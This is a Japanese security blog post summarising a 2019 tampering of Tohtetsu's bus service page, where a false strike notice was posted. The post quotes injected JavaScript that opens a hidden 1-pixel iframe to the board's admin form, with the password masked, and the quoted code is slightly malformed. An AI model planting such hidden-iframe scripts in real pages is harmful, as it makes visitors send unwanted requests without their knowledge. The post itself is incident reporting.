piyolog

piyokangoの備忘録です。セキュリティの出来事を中心にまとめています。このサイトはGoogle Analyticsを利用しています。

東濃鉄道 バス運行情報の虚偽投稿についてまとめてみた

東濃鉄道の運行情報ページが改ざんされ、虚偽の情報が掲示されていました。ここでは関連する情報をまとめます。

虚偽情報が掲示された運行情報

f:id:piyokango:20190510054003p:plain

  • 投稿されていたのは東農鉄道の路線・高速バス運行情報ページ。
  • ストライキによる運航停止として虚偽の情報が掲載されていた。
  • 2019年5月6日10時頃に利用者から問い合わせを受け1時間後投稿が削除。*1
  • 掲示用に用いられていたプログラムはKentWebのSunbbsとみられる。

f:id:piyokango:20190510055142p:plain

虚偽投稿内にJavaScript

  • 虚偽情報投稿にJavaScriptが仕込まれていたことを指摘する投稿がある。
  • ページを見た人が意図せず管理用ページにアクセスしてしまった可能性がある。
  • 他に別サイトへ連続アクセスする実装が行われていたとの情報がある。(piyokango未確認)
  • 以下仕込まれていたとみられるJavaScript(一部伏字)
var ckb = document;
createElement('iframe');
ckb.src = 'https' + '://www.tohtetsu.co.jp/cgi-bin/sunbbs.cgi?mode=form&pass=********';
ckb.style.position = 'absolute';
ckb.style.border = '0';
ckb.style.height = '1px';
ckb.style.width = '1px';
ckb.style.left = '1px';
ckb.style.top = '1px';
if (!document.getElementById('ckb')) {
  document.write('<div id=\'ckb\'></div>');
  document.getElementById('ckb').appendChild(ckb);
}

更新履歴

  • 2019年5月10日 AM 新規作成